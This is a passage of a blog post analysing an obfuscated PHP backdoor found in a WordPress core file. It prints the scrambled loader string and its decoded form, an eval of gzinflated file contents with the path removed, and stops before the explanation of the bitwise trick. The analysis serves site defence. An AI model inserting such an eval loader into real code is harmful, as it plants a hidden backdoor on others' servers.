Tag Archives: Pharma Hack

Convert random-looking string into readable PHP, using bitwise operator, to reveal pharma hack

Today I came across an interesting piece of code in an archived WordPress 3.4.1 installation. At first it didn’t make much sense, but after careful examination, it wasn’t so random after all — malicious code never is.

It looked something like this:

$lang = 'e~o~*'.Twzinf.'~g|u('.vylu_g.'}'.w_konum.'~'.wsjf.':))o{'&uwal.'|bo~'.onn

There’s a variable called $lang consisting of several strings (e~o~*, ~g|u(, }) and constants (Twzinf, vylu_g, w_konum), but the thing is, those constants aren’t defined anywhere, so what is their purpose? In any event, the worst case scenario is that there is a variable with some gibberish, neatly tucked away in wp-includes/load.php, right?

Nope, otherwise this would conclude the blog post :).

Before we break down what this seemingly random piece of code does, here is what it actually looks like once PHP executes it:

$lang = eval(@gzinflate(file_get_contents("")));

I’ve removed the actual file path within the quotation marks, but you can immediately tell how dangerous this is, because it retrieves contents from an unknown file on the server, uncompresses it, and then executes whatever the file contains with no questions asked.

That’s a problem.

Let’s look at how PHP got there.

Continue reading